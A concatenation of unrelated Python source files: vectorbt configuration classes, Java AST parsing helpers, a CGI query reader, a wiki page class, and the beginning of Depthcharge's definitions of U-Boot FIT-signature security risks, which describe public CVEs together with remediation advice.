Won't convert dicts that are already configs.
Apart from boolean, you can set it to any subclass of `Config` to use it for construction.
Requires `nested` to be True. Defaults to False.
as_attrs (bool): Whether to enable accessing dict keys via the dot notation.
Enables autocompletion (but only during runtime!).
Raises error in case of naming conflicts.
Defaults to True if `frozen` or `readonly`, otherwise False.
Defaults can be overridden with settings under `config` in `vectorbt._settings.settings`.
If another config is passed, its properties are copied over, but they can still be overridden
with the arguments passed to the initializer.
!!! note
All arguments are applied only once during initialization.
"""
_copy_kwargs_: tp.Kwargs
_reset_dct_: dict
_reset_dct_copy_kwargs_: tp.Kwargs
_frozen_keys_: bool
_readonly_: bool
_nested_: bool
_convert_dicts_: tp.Union[bool, tp.Type["Config"]]
_as_attrs_: bool
def __init__(self,
dct: tp.DictLike = None,
copy_kwargs: tp.KwargsLike = None,
reset_dct: tp.DictLike = None,
reset_dct_copy_kwargs: tp.KwargsLike = None,
frozen_keys: tp.Optional[bool] = None,
readonly: tp.Optional[bool] = None,
nested: tp.Optional[bool] = None,
convert_dicts: tp.Optional[tp.Union[bool, tp.Type["Config"]]] = None,
as_attrs: tp.Optional[bool] = None) -> None:
try:
from vectorbt._settings import settings
configured_cfg = settings['config']
except ImportError:
configured_cfg = {}
if dct is None:
dct = dict()
# Resolve params
def _resolve_param(pname: str, p: tp.Any, default: tp.Any, merge: bool = False) -> tp.Any:
cfg_default = configured_cfg.get(pname, None)
dct_p = getattr(dct, pname + '_') if isinstance(dct, Config) else None
if merge and isinstance(default, dict):
return merge_dicts(default, cfg_default, dct_p, p)
if p is not None:
return p
if dct_p is not None:
return dct_p
if cfg_default is not None:
return cfg_default
return default
reset_dct = _resolve_param('reset_dct', reset_dct, None)
frozen_keys = _resolve_param('frozen_keys', frozen_keys, False)
readonly = _resolve_param('readonly', readonly, False)
nested = _resolve_param('nested', nested, False)
convert_dicts = _resolve_param('convert_dicts', convert_dicts, False)
as_attrs = _resolve_param('as_attrs', as_attrs, frozen_keys or readonly)
reset_dct_copy_kwargs = merge_dicts(copy_kwargs, reset_dct_copy_kwargs)
copy_kwargs = _resolve_param(
'copy_kwargs',
copy_kwargs,
dict(
copy_mode='shallow' if readonly else 'hybrid',
nested=nested
),
merge=True
)
reset_dct_copy_kwargs = _resolve_param(
'reset_dct_copy_kwargs',
reset_dct_copy_kwargs,
dict(
copy_mode='shallow' if readonly else 'hybrid',
nested=nested
),
merge=True
)
# Copy dict
dct = copy_dict(dict(dct), **copy_kwargs)
# Convert child dicts
if convert_dicts:
if not nested:
raise ValueError("convert_dicts requires nested to be True")
for k, v in dct.items():
if isinstance(v, dict) and not isinstance(v, Config):
if isinstance(convert_dicts, bool):
config_cls = self.__class__
elif issubclass(convert_dicts, Config):
config_cls = convert_dicts
else:
raise TypeError("convert_dicts must be either boolean or a subclass of Config")
dct[k] = config_cls(
v,
copy_kwargs=copy_kwargs,
reset_dct_copy_kwargs=reset_dct_copy_kwargs,
frozen_keys=frozen_keys,
readonly=readonly,
nested=nested,
convert_dicts=convert_dicts,
as_attrs=as_attrs
)
# Copy initial config
if reset_dct is None:
reset_dct = dct
reset_dct = copy_dict(dict(reset_dct), **reset_dct_copy_kwargs)
dict.__init__(self, dct)
# Store params in an instance variable
checks.assert_type(copy_kwargs, dict)
checks.assert_type(reset_dct, dict)
checks.assert_type(reset_dct_copy_kwargs, dict)
checks.assert_type(frozen_keys, bool)
checks.assert_type(readonly, bool)
checks.assert_type(nested, bool)
checks.assert_type(convert_dicts, (bool, type))
checks.assert_type(as_attrs, bool)
self.__dict__['_copy_kwargs_'] = copy_kwargs
self.__dict__['_reset_dct_'] = reset_dct
self.__dict__['_reset_dct_copy_kwargs_'] = reset_dct_copy_kwargs
self.__dict__['_frozen_keys_'] = frozen_keys
self.__dict__['_readonly_'] = readonly
self.__dict__['_nested_'] = nested
self.__dict__['_convert_dicts_'] = convert_dicts
self.__dict__['_as_attrs_'] = as_attrs
# Set keys as attributes for autocomplete
if as_attrs:
for k, v in self.items():
if k in self.__dir__():
raise ValueError(f"Cannot set key '{k}' as attribute of the config. Disable set_attrs.")
self.__dict__[k] = v
@property
def copy_kwargs_(self) -> tp.Kwargs:
"""Parameters for copying `dct`."""
return self._copy_kwargs_
@property
def reset_dct_(self) -> dict:
"""Dict to fall back to in case of resetting."""
return self._reset_dct_
@property
def reset_dct_copy_kwargs_(self) -> tp.Kwargs:
"""Parameters for copying `reset_dct`."""
return self._reset_dct_copy_kwargs_
@property
def frozen_keys_(self) -> bool:
"""Whether to deny updates to the keys and values of the config."""
return self._frozen_keys_
@property
def readonly_(self) -> bool:
"""Whether to deny any updates to the config."""
return self._readonly_
@property
def nested_(self) -> bool:
"""Whether to do operations recursively on each child dict."""
return self._nested_
@property
def convert_dicts_(self) -> tp.Union[bool, tp.Type["Config"]]:
"""Whether to convert child dicts to configs with the same configuration."""
return self._convert_dicts_
@property
def as_attrs_(self) -> bool:
"""Whether to enable accessing dict keys via dot notation."""
return self._as_attrs_
def __setattr__(self, k: str, v: tp.Any) -> None:
if self.as_attrs_:
self.__setitem__(k, v)
def __setitem__(self, k: str, v: tp.Any, force: bool = False) -> None:
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
if k not in self:
raise KeyError(f"Config keys are frozen: key '{k}' not found")
dict.__setitem__(self, k, v)
if self.as_attrs_:
self.__dict__[k] = v
def __delattr__(self, k: str) -> None:
if self.as_attrs_:
self.__delitem__(k)
def __delitem__(self, k: str, force: bool = False) -> None:
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
raise KeyError(f"Config keys are frozen")
dict.__delitem__(self, k)
if self.as_attrs_:
del self.__dict__[k]
def _clear_attrs(self, prior_keys: tp.Iterable[str]) -> None:
"""Remove attributes of the removed keys given keys prior to the removal."""
if self.as_attrs_:
for k in set(prior_keys).difference(self.keys()):
del self.__dict__[k]
def pop(self, k: str, v: tp.Any = _RaiseKeyError, force: bool = False) -> tp.Any:
"""Remove and return the pair by the key."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
raise KeyError(f"Config keys are frozen")
prior_keys = list(self.keys())
if v is _RaiseKeyError:
result = dict.pop(self, k)
else:
result = dict.pop(self, k, v)
self._clear_attrs(prior_keys)
return result
def popitem(self, force: bool = False) -> tp.Tuple[tp.Any, tp.Any]:
"""Remove and return some pair."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
raise KeyError(f"Config keys are frozen")
prior_keys = list(self.keys())
result = dict.popitem(self)
self._clear_attrs(prior_keys)
return result
def clear(self, force: bool = False) -> None:
"""Remove all items."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
if not force and self.frozen_keys_:
raise KeyError(f"Config keys are frozen")
prior_keys = list(self.keys())
dict.clear(self)
self._clear_attrs(prior_keys)
def update(self, *args, nested: tp.Optional[bool] = None, force: bool = False, **kwargs) -> None:
"""Update the config.
See `update_dict`."""
other = dict(*args, **kwargs)
if nested is None:
nested = self.nested_
update_dict(self, other, nested=nested, force=force)
def __copy__(self: ConfigT) -> ConfigT:
"""Shallow operation, primarily used by `copy.copy`.
Does not take into account copy parameters."""
cls = self.__class__
self_copy = cls.__new__(cls)
for k, v in self.__dict__.items():
if k not in self_copy: # otherwise copies dict keys twice
self_copy.__dict__[k] = v
self_copy.clear(force=True)
self_copy.update(copy(dict(self)), nested=False, force=True)
return self_copy
def __deepcopy__(self: ConfigT, memo: tp.DictLike = None) -> ConfigT:
"""Deep operation, primarily used by `copy.deepcopy`.
Does not take into account copy parameters."""
if memo is None:
memo = {}
cls = self.__class__
self_copy = cls.__new__(cls)
memo[id(self)] = self_copy
for k, v in self.__dict__.items():
if k not in self_copy: # otherwise copies dict keys twice
self_copy.__dict__[k] = deepcopy(v, memo)
self_copy.clear(force=True)
self_copy.update(deepcopy(dict(self), memo), nested=False, force=True)
return self_copy
def copy(self: ConfigT, reset_dct_copy_kwargs: tp.KwargsLike = None, **copy_kwargs) -> ConfigT:
"""Copy the instance in the same way it's done during initialization.
`copy_kwargs` override `Config.copy_kwargs_` and `Config.reset_dct_copy_kwargs_` via merging.
`reset_dct_copy_kwargs` override merged `Config.reset_dct_copy_kwargs_`."""
self_copy = self.__copy__()
reset_dct_copy_kwargs = merge_dicts(self.reset_dct_copy_kwargs_, copy_kwargs, reset_dct_copy_kwargs)
reset_dct = copy_dict(dict(self.reset_dct_), **reset_dct_copy_kwargs)
self.__dict__['_reset_dct_'] = reset_dct
copy_kwargs = merge_dicts(self.copy_kwargs_, copy_kwargs)
dct = copy_dict(dict(self), **copy_kwargs)
self_copy.update(dct, nested=False, force=True)
return self_copy
def merge_with(self: ConfigT, other: InConfigLikeT,
nested: tp.Optional[bool] = None, **kwargs) -> OutConfigLikeT:
"""Merge with another dict into one single dict.
See `merge_dicts`."""
if nested is None:
nested = self.nested_
return merge_dicts(self, other, nested=nested, **kwargs)
def reset(self, force: bool = False, **reset_dct_copy_kwargs) -> None:
"""Clears the config and updates it with the initial config.
`reset_dct_copy_kwargs` override `Config.reset_dct_copy_kwargs_`."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
reset_dct_copy_kwargs = merge_dicts(self.reset_dct_copy_kwargs_, reset_dct_copy_kwargs)
reset_dct = copy_dict(dict(self.reset_dct_), **reset_dct_copy_kwargs)
self.clear(force=True)
self.update(self.reset_dct_, nested=False, force=True)
self.__dict__['_reset_dct_'] = reset_dct
def make_checkpoint(self, force: bool = False, **reset_dct_copy_kwargs) -> None:
"""Replace `reset_dct` by the current state.
`reset_dct_copy_kwargs` override `Config.reset_dct_copy_kwargs_`."""
if not force and self.readonly_:
raise TypeError("Config is read-only")
reset_dct_copy_kwargs = merge_dicts(self.reset_dct_copy_kwargs_, reset_dct_copy_kwargs)
reset_dct = copy_dict(dict(self), **reset_dct_copy_kwargs)
self.__dict__['_reset_dct_'] = reset_dct
def dumps(self, **kwargs) -> bytes:
"""Pickle to bytes."""
return dill.dumps(dict(
dct=PickleableDict(self).dumps(**kwargs),
copy_kwargs=self.copy_kwargs_,
reset_dct=PickleableDict(self.reset_dct_).dumps(**kwargs),
reset_dct_copy_kwargs=self.reset_dct_copy_kwargs_,
frozen_keys=self.frozen_keys_,
readonly=self.readonly_,
nested=self.nested_,
convert_dicts=self.convert_dicts_,
as_attrs=self.as_attrs_
), **kwargs)
@classmethod
def loads(cls: tp.Type[ConfigT], dumps: bytes, **kwargs) -> ConfigT:
"""Unpickle from bytes."""
obj = dill.loads(dumps, **kwargs)
return cls(
dct=PickleableDict.loads(obj['dct'], **kwargs),
copy_kwargs=obj['copy_kwargs'],
reset_dct=PickleableDict.loads(obj['reset_dct'], **kwargs),
reset_dct_copy_kwargs=obj['reset_dct_copy_kwargs'],
frozen_keys=obj['frozen_keys'],
readonly=obj['readonly'],
nested=obj['nested'],
convert_dicts=obj['convert_dicts'],
as_attrs=obj['as_attrs']
)
def load_update(self, fname: tp.FileName, **kwargs) -> None:
"""Load dumps from a file and update this instance.
!!! note
Updates both the config properties and dictionary."""
loaded = self.load(fname, **kwargs)
self.clear(force=True)
self.__dict__.clear()
self.__dict__.update(loaded.__dict__)
self.update(loaded, nested=False, force=True)
def __eq__(self, other: tp.Any) -> bool:
return checks.is_deep_equal(dict(self), dict(other))
class AtomicConfig(Config, atomic_dict):
"""Config that behaves like a single value when merging."""
pass
ConfiguredT = tp.TypeVar("ConfiguredT", bound="Configured")
class Configured(Pickleable):
"""Class with an initialization config.
All subclasses of `Configured` are initialized using `Config`, which makes it easier to pickle.
Config settings are defined under `config.configured` in `vectorbt._settings.settings`.
!!! warning
If any attribute has been overwritten that isn't listed in `Configured.writeable_attrs`,
or if any `Configured.__init__` argument depends upon global defaults,
their values won't be copied over. Make sure to pass them explicitly to
make the saved & loaded / copied instance resilient to changes in globals."""
writeable_attrs: tp.ClassVar[tp.List[str]] = []
"""List of writeable attributes that will be saved/copied along with the config."""
def __init__(self, **config) -> None:
from vectorbt._settings import settings
configured_cfg = settings['config']['configured']
self._config = Config(config, **configured_cfg)
self.writeable_attrs = copy(self.writeable_attrs)
@property
def config(self) -> Config:
"""Initialization config."""
return self._config
def copy(self: ConfiguredT, nested: tp.Optional[bool] = None, **new_config) -> ConfiguredT:
"""Copy config and writeable attributes to initialize a new instance.
!!! warning
This "copy" operation won't return a copy of the instance but a new instance
initialized with the same config and writeable attributes."""
new_instance = self.__class__(**self.config.merge_with(new_config, nested=nested))
for attr in self.writeable_attrs:
setattr(new_instance, attr, getattr(self, attr))
return new_instance
def dumps(self, **kwargs) -> bytes:
"""Pickle to bytes."""
config_dumps = self.config.dumps(**kwargs)
attr_dct = PickleableDict({attr: getattr(self, attr) for attr in self.writeable_attrs})
attr_dct_dumps = attr_dct.dumps(**kwargs)
return dill.dumps((config_dumps, attr_dct_dumps), **kwargs)
@classmethod
def loads(cls: tp.Type[ConfiguredT], dumps: bytes, **kwargs) -> ConfiguredT:
"""Unpickle from bytes."""
config_dumps, attr_dct_dumps = dill.loads(dumps, **kwargs)
config = Config.loads(config_dumps, **kwargs)
attr_dct = PickleableDict.loads(attr_dct_dumps, **kwargs)
new_instance = cls(**config)
for attr, obj in attr_dct.items():
setattr(new_instance, attr, obj)
return new_instance
def __eq__(self, other: tp.Any) -> bool:
"""Objects are equal if their configs and writeable attributes are equal."""
if type(self) != type(other):
return False
if self.writeable_attrs != other.writeable_attrs:
return False
for attr in self.writeable_attrs:
if not checks.is_deep_equal(getattr(self, attr), getattr(other, attr)):
return False
return self.config == other.config
def getattr(self, *args, **kwargs) -> tp.Any:
"""See `vectorbt.utils.attr.deep_getattr`."""
return deep_getattr(self, *args, **kwargs)
def update_config(self, *args, **kwargs) -> None:
"""Force-update the config."""
self.config.update(*args, **kwargs, force=True)
|
import datetime
import logging
import operator as op
import os
import re
import shutil
from functools import partial
from itertools import chain, islice, ifilter, ifilterfalse
import antlr3
from antlr3.tree import CommonTree as AST
from grammar.JavaLexer import JavaLexer as Lexer
from grammar.JavaParser import JavaParser as Parser
import lib.glob2 as glob2
from lib.typecheck import *
import lib.const as C
"""
regarding paths and files
"""
# clean all the contents in the designated path, excluding that path
@takes(str)
@returns(nothing)
def clean_dir(path):
for root, dirs, files in os.walk(path):
for f in files:
try: os.unlink(os.path.join(root, f))
except OSError: pass # maybe .swp file
for d in dirs:
shutil.rmtree(os.path.join(root, d))
# get the *sorted* list of file names in the designated path
# template/gui/awt -> [.../AWTEvent.java, .../BorderLayout.java, ...]
@takes(str, str)
@returns(list_of(str))
def get_files_from_path(path, ext):
if os.path.isfile(path): return [path]
else: # i.e., folder
files = glob2.glob(os.path.join(path, "**/*.{}".format(ext)))
return sorted(files) # to guarantee the order of files read
# base name without extension
# result/button_demo.txt -> button_demo
@takes(str)
@returns(str)
def pure_base(path):
base = os.path.basename(path)
return os.path.splitext(base)[0]
# build folders for the given package name
# e.g., for x.y, generate x and then y under x if not exist
@takes(str, unicode)
@returns(nothing)
def build_pkg_folders(java_dir, pkg):
p = java_dir
for elt in pkg.split('.'):
p = os.path.join(p, elt)
if not os.path.exists(p):
os.makedirs(p)
"""
regarding Java features
"""
# extract parameterized types
# Map<K, V> -> [K, V]
# List<T> -> [T]
# Map<K, List<T>> -> [K, List<T>]
@takes(unicode, optional(unicode))
@returns(list_of(unicode))
def extract_generics(tname, base=u"\S+"):
regex = r"^({})<(.+)>$".format(base)
m = re.match(regex, tname.strip())
if m: # m.group(1) = collection name
typs = [m.group(1)] + m.group(2).split(',')
return map(op.methodcaller("strip"), typs)
else: return []
# Map<K,V> / List<T> / ... -> [Map, K, V] / [List, T] / ...
@takes(unicode)
@returns(list_of(unicode))
def of_collection(tname):
for collection in C.collections:
if collection in tname:
typs = extract_generics(tname, u'|'.join(C.collections))
if any(typs): return typs
return []
# check whether the given type name is kind of Java collections
@takes(unicode)
@returns(bool)
def is_collection(tname):
return any(of_collection(tname))
# check whether the given type name has bounded type parameter(s)
@takes(unicode)
@returns(bool)
def is_generic(tname):
return any(extract_generics(tname))
# ArrayAdapter<?> -> [ArrayAdapter, ?]
@takes(unicode)
@returns(list_of(unicode))
def explode_generics(tname):
if is_generic(tname):
return extract_generics(tname)
else: return [tname]
# extrace base type out of array
# e.g., X[] -> X
@takes(unicode)
@returns(optional(unicode))
def componentType(tname):
if tname.endswith("[]"): return tname[:-2]
else: return None
# check whether the given type name is kind of array
@takes(unicode)
@returns(bool)
def is_array(tname):
return '[' in tname and ']' in tname
# check whether the given type name is a possible class name or not
@takes(unicode)
@returns(bool)
def is_class_name(tname):
return tname[0].isupper()
# sanitize type name
# e.g., Demo$1 -> Demo_1, Outer.Inner -> Outer_Inner
# ArrayAdapter<?> (-> ArrayAdapter_?) -> ArrayAdapter_Object
@takes(unicode)
@returns(unicode)
def sanitize_ty(tname):
#repl_map = {"$": "_", ".": "_"}
#repl_dic = dict((re.escape(k), v) for k, v in repl_map.iteritems())
#pattern = re.compile(" | ".join(repl_dic.keys()))
#return pattern.sub(lambda m: repl_dic[re.escape(m.group(0))], tname)
_tname = tname.replace('$','_').replace('.','_')
if is_generic(_tname):
_tname = u'_'.join(explode_generics(_tname))
return _tname.replace('?', C.J.OBJ)
# convert type name to JVM notation
# e.g., x.y.Z -> Lx/y/Z;
@takes(unicode)
@returns(unicode)
def toJVM(tname):
if is_class_name(tname.split('.')[-1]):
return u'L' + tname.replace('.','/') + u';'
elif is_array(tname):
return u'[' + toJVM(componentType(tname))
else: return tname
# default value of the given time, depending on framework
_default_values = {
C.J.i: u"0",
C.J.z: C.J.FALSE,
u"default": C.J.N
}
@takes(str, unicode, unicode)
@returns(unicode)
def default_value(cmd, ty, vname):
if cmd == "android":
if ty in C.primitives:
if ty == C.J.z:
v = u"SymUtil.new_sym_bit(\"{}\")".format(vname)
else:
v = u"SymUtil.new_sym_int(\"{}\")".format(vname)
else:
v = u"SymUtil.new_sym(\"{}\", \"{}\")".format(vname, ty)
else:
if ty in _default_values:
v = _default_values[ty]
else: v = _default_values[u"default"]
return v
# autoboxing, e.g., int -> Integer
@takes(unicode)
@returns(unicode)
def autoboxing(tname):
if tname in C.primitives:
for i, v in enumerate(C.primitives):
if tname == v: return C.autoboxing[i]
return tname
# unboxing, e.g., Character -> char
@takes(unicode)
@returns(unicode)
def unboxing(tname):
if tname in C.autoboxing:
for i, v in enumerate(C.autoboxing):
if tname == v: return C.primitives[i]
return tname
# short form representation of type name
@takes(unicode)
@returns(optional(unicode))
def to_shorty(tname):
# TODO: (multi-dimensional) array
if tname in C.primitives:
for key, value in C.J.__dict__.iteritems():
if tname == value: return unicode(key)
elif is_class_name(tname):
return u'L'
else: # erroneous
return None
# Sketch-ish short form representation of type name
@takes(unicode)
@returns(unicode)
def to_shorty_sk(tname):
shorty = to_shorty(tname)
if shorty in [u'b', u's', u'i', u'j']: return u'i'
elif shorty == u'z': return u'z'
else: return u''
# check if quoted with double quotation marks
@takes(unicode)
@returns(bool)
def is_str(x):
return len(x) >= 2 and (x[0] == '"' and x[-1] == '"')
# check if quoted with single quotation marks
@takes(unicode)
@returns(bool)
def is_char(x):
return len(x) >= 2 and (x[0] == '\'' and x[-1] == '\'')
# capitalize the first character only
# e.g., applicationContext -> ApplicationContext
@takes(unicode)
@returns(unicode)
def cap_1st_only(s):
return s[:1].upper() + s[1:] if s else ''
# explode method name
# android.app.Activity.onCreate -> android.app, Activity, onCreate
@takes(unicode)
@returns(tuple_of(unicode))
def explode_mname(mname):
mid = mname.split('.')
mtd = mid[-1]
if len(mid) > 1:
cls = mid[-2]
pkg = u'.'.join(mid[:-2])
else:
pkg = cls = u''
return (pkg, cls, mtd)
"""
handling ANTLR AST
"""
@takes(list_of(str))
@returns(AST)
def toAST(files):
ast = antlr3.tree.CommonTree(None)
for fname in files:
logging.debug("reading: " + os.path.normpath(fname))
f_stream = antlr3.FileStream(fname)
lexer = Lexer(f_stream)
t_stream = antlr3.CommonTokenStream(lexer)
parser = Parser(t_stream)
try: _ast = parser.compilationUnit()
except antlr3.RecognitionException:
traceback.print_stack()
sys.exit(1)
ast.addChild(_ast.tree)
return ast
# implode Ids
# KeyEvent . Callback -> KeyEvent.Callback
# Map < String, SharedPreferences > -> Map<String,SharedPreferences>
@takes(AST)
@returns(unicode)
def implode_id(node):
def retrieve_info(node):
t = node.getText()
if node.getChildCount() <= 0: below = u''
else: below = u''.join(map(retrieve_info, node.getChildren()))
if not t or t in C.T.__dict__.values(): return below
else: return t + below
ids = map(retrieve_info, node.getChildren())
return u''.join(ids)
# make a virtual node with the given children
# e.g., (uop id . id (ARGUMENT ...)) -> (None id . id (ARGUMENT ...))
@takes(list_of(AST))
@returns(AST)
def mk_v_node_w_children(nodes):
v_node = AST(None)
v_node.addChildren(nodes)
return v_node
# implode and explode comma-separated elements
# [d , l . distance] -> [(None d), (None l . distance)]
@takes(list_of(AST))
@returns(list_of(AST))
def parse_comma_elems(nodes):
def reduce_at_comma((res, acc), node):
if node.getText() == ',':
return res + [mk_v_node_w_children(acc)], []
else:
return res, acc + [node]
res, acc = reduce(reduce_at_comma, nodes, ([], []))
if not acc: return res
else: return res + [mk_v_node_w_children(acc)]
"""
utilities whose names are inspired by OCaml
"""
# base class for exceptions regarding List
class ListError(Exception): pass
# ~ List.tl in OCaml
# remove the head of the list
@takes(list)
@returns(list)
def tl(lst):
if len(lst) < 1: raise ListError("tl")
return list(islice(lst, 1, None))
# ~ List.exists in OCaml
# checks if at least one element of the list satisfies the predicate
@takes(callable, list)
@returns(bool)
def exists(pred, lst):
return any(filter(pred, lst))
# ~ List.find in OCaml
# find the first element of interest
@takes(callable, list)
@returns(anything)
def find(pred, lst):
f_ed = filter(pred, lst)
if not f_ed: raise ListError("Not_found")
else: return f_ed[0]
# ~ List.assoc in OCaml
# return the value associated with the given key
# e.g., assoc(a, [..., (a, b), ...]) == b
@takes(anything, list_of(tuple_of(anything)))
@returns(anything)
def assoc(a, lst):
for x, y in lst:
if a == x: return y
raise ListError("Not_found")
# ~ List.partition in OCaml
# divide the given list into two lists:
# one satisfying the conditoin and the other not satisfying the condition
# e.g., \x . x > 0, [1, -2, -3, 4] -> [1, 4], [-2, -3]
@takes(callable, list)
@returns(tuple_of(list))
def partition(pred, lst):
return list(ifilter(pred, lst)), list(ifilterfalse(pred, lst))
# ~ List.split in OCaml
# transform a list of pairs into a pair of lists
# e.g., [ (1, 'a'), (2, 'b'), (3, 'c') ] -> ([1, 2, 3], ['a', 'b', 'c'])
@takes(list_of(tuple_of(anything)))
@returns(tuple_of(list_of(anything)))
def split(lst):
if not lst: return ([], [])
else:
a, b = zip(*lst) # zip doesn't handle an empty list
return (list(a), list(b))
# ~ List.flatten in OCaml
# e.g., [ [1], [2, 3], [4] ] -> [1, 2, 3, 4]
@takes(list_of(list_of(anything)))
@returns(list_of(anything))
def flatten(lstlst):
return list(chain.from_iterable(lstlst))
# flatten class declarations or hierarchy
# "inners": class A { class Inner { class InnerMost }} -> [A, Inner, InnerMost]
# "subs": ActA, ActB, ... < Act < Cxt -> [Cxt, Act, ActA, ActB, ...]
@takes(list_of("Clazz"), str)
@returns(list_of("Clazz"))
def flatten_classes(clss, attr):
mapped = map(op.attrgetter(attr), clss)
if not mapped: return clss
else:
flattened = flatten(mapped)
diff = list(set(flattened) - set(clss))
if not diff: return clss
else: return flatten_classes(clss + diff, attr)
"""
More utilities
"""
# intersection: common elements in both lists
# e.g., [a, b, c] & [a, b, d] -> [a, b]
@takes(list_of(anything))
@returns(list_of(anything))
def intersection(lst1, lst2):
return list(set(lst1) & set(lst2))
# remove duplicates in the given list
# e.g., [1, 2, 2] -> [1, 2]
@takes(list_of(anything))
@returns(list_of(anything))
def rm_dup(lst):
return list(set(lst))
# remove None in the given list
# e.g., [1, 2, None, 3] -> [1, 2, 3]
@takes(list_of(anything))
@returns(list_of(anything))
def rm_none(lst):
return filter(partial(op.is_not, None), lst)
# remove anything that is evaluated to False, such as None or empty string
# e.g., [1, 2, None, 3] -> [1, 2, 3]
# ["a", "", "z"] => ["a", "z"]
@takes(list_of(anything))
@returns(list_of(anything))
def ffilter(lst):
return filter(None, lst)
# make a new entry of list type or append the given item
# e.g., {x: [1]}, x, 2 => {x: [1,2]}
# {x: [1]}, y, 2 => {x: [1], y: [2]}
@takes(dict_of(anything, list_of(anything)), anything, anything, optional(bool))
@returns(nothing)
def mk_or_append(dic, k, v, uniq=True):
if k in dic: # already bound key
if not uniq or v not in dic[k]: # uniq => value v not recorded
dic[k].append(v)
else: # new occurence of key k
dic[k] = [v]
@takes(list_of(dict_of(anything, list_of(anything))))
@returns(dict_of(anything, list_of(anything)))
def merge_dict(lst):
def reducer(acc, dic):
keys = set(acc.keys() + dic.keys())
return dict((k, rm_dup(acc.get(k, []) + dic.get(k, []))) for k in keys)
return reduce(reducer, lst, {})
@takes(nothing)
@returns(str)
def get_datetime():
return datetime.datetime.now().strftime("%y%m%d_%H%M%S")
"""
Yale Sparse Matrix Format
http://www.cs.yale.edu/publications/techreports/tr112.pdf
"""
@takes(list_of(list_of(int)))
@returns(tuple_of(list_of(int)))
def yale_format(mat):
if not mat: return [], [], []
# assume rows are of the same size
m, n = len(mat), len(mat[0])
A = []
IA = []
JA = []
ja_idx = 0
IA.append(ja_idx)
for i in xrange(0, m):
for j in xrange(0, n):
itm = mat[i][j]
if itm:
A.append(itm)
JA.append(j)
ja_idx = ja_idx + 1
IA.append(ja_idx)
return A, IA, JA
|
#!/usr/bin/env python
import os
from query_string import query_string
__all__ = ["GET"]
def _get():
kwargs = dict()
if "QUERY_STRING" in os.environ:
QUERY_STRING = os.environ["QUERY_STRING"]
qs = query_string(QUERY_STRING)
for k in qs:
v = qs[k]
kwargs[k] = v
return kwargs
GET = _get()
|
""" Contains WikiPage type """
from __future__ import annotations
# noinspection PyPep8Naming
from mwclient import Site as API
from utils.ScorableItem import ScorableItem
# noinspection PyPep8Naming
TITLE_SAFE_CHARACTERS = "/ "
SPACE_REPLACEMENT = "_"
# noinspection PyShadowingBuiltins
# pylint: disable=too-few-public-methods,redefined-builtin
class WikiPage(ScorableItem):
""" Holds data used to identify wiki pages """
wiki: API
id: int
title: str
display_title: str
namespace: str
url: str
_score: int = 0
# pylint: disable=too-many-arguments
def __init__(self, wiki: API, id: int, title: str,
display_title: str, namespace: str, url: str) -> None:
super().__init__()
self.wiki = wiki
self.id = id
self.title = title
self.display_title = display_title
self.namespace = namespace
self.url = url
def _get_score_fields(self) -> list[str]:
return [self.title]
|
# SPDX-License-Identifier: BSD-3-Clause
# Depthcharge: <https://github.com/nccgroup/depthcharge>
"""
Built-in SecurityRisk definitions associated with FIT image functionality
"""
from textwrap import dedent
from .. import SecurityImpact
def _enabled_with_legacy_image(value: str, config: dict):
return value and config.get('CONFIG_LEGACY_IMAGE_FORMAT', False)
_BUILTIN_DEFS = (
('CONFIG_FIT_SIGNATURE', True, {
'identifier': 'CVE-2018-3968',
'impact': SecurityImpact.VERIFICATION_BYPASS,
'summary':
'Unsigned "legacy" images can be still executed when FIT image signature validation is enabled',
'description': dedent("""\
Prior to U-Boot 2014.07-rc3 there was no build-time configuration option for disabling
support for unsigned "legacy" images. As a result, enabling FIT image signature
validation via `CONFIG_FIT_SIGNATURE=y` was not sufficient to ensure that only
images passing signature validation could be booted.
Given the ability to stage an unsigned "legacy" image and pass it to `bootm`, an
attacker can bypass signature validation and execute arbitrary code.
Refer to the following advisory for more information:
<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0633>
"""),
'recommendation': dedent("""\
Update to U-Boot 2014.07 or otherwise backport the changes from commit 21d29f7f.
Ensure `CONFIG_LEGACY_IMAGE_FORMAT` is disabled when using `CONFIG_FIT_SIGNATURE=y`.
"""),
'affected_versions': ('2013.07-rc1', '2014.07-rc2')
}),
('CONFIG_FIT_SIGNATURE', True, {
'identifier': 'CVE-2018-1000205',
'summary': 'Edge cases in FIT and FDT code could result in a verified boot bypass',
'impact': SecurityImpact.VERIFICATION_BYPASS,
'description': dedent("""\
The following mailing list post proposed three patches to unaccounted for edge cases
believed to present a risk of verified boot bypasses. The author notes that the threat
scenario requires special hardware behavior. Determining the susceptibility of any given
platform would require more review, as information in the CVE entry is sparse.
Link:
<https://lists.denx.de/pipermail/u-boot/2018-June/330898.html>
"""),
# Before commenting on backporting patches, need to investigate the item noted below.
# The author's vboot patches landed in 7346c1e1 and 72239fc8.
#
# TODO: Track down the FDT change WRT https://lists.denx.de/pipermail/u-boot/2018-June/330601.html
#
'recommendation': 'Update to U-Boot 2018.09.\n',
'affected_versions': ('0.0', '2018.09')
}),
# Vestigial reference design configuration that results in behavior similar to CVE-2018-3968
('CONFIG_FIT_SIGNATURE', _enabled_with_legacy_image, {
'identifier': 'BOTH_LEGACY_AND_FIT_SIG_ENABLED',
'impact': SecurityImpact.VERIFICATION_BYPASS,
'summary':
'Unsigned "legacy" images can be still executed when FIT image signature validation is enabled',
'description': dedent("""\
In order for U-Boot's FIT signature enforcement to be effective, support for the unsigned
"legacy" image format must be disabled. Otherwise, an attacker can bypass signature validation
by providing and booting a legacy image.
In U-Boot 2014.07 and later, enabling `CONFIG_FIT_SIGNATURE=y` implies that
`CONFIG_LEGACY_IMAGE_FORMAT` should be disabled by default. However, if `CONFIG_LEGACY_IMAGE_FORMAT`
is explicitly enabled in the platform configuration (as is the case in many reference
design configuration), legacy image support will still be included. This results in the
configuration described above, which may undermine the intended image authenticity
enforcement goals.
"""),
'recommendation': dedent("""\
Disable the legacy image format via `CONFIG_LEGACY_IMAGE_FORMAT` in situations where a
platform shall only boot signed, verified images.
"""),
}),
# Fixes for this appeared to land in the merge commit @ e0718b3ab754860bd47677e6b4fc5b70da42c4ab,
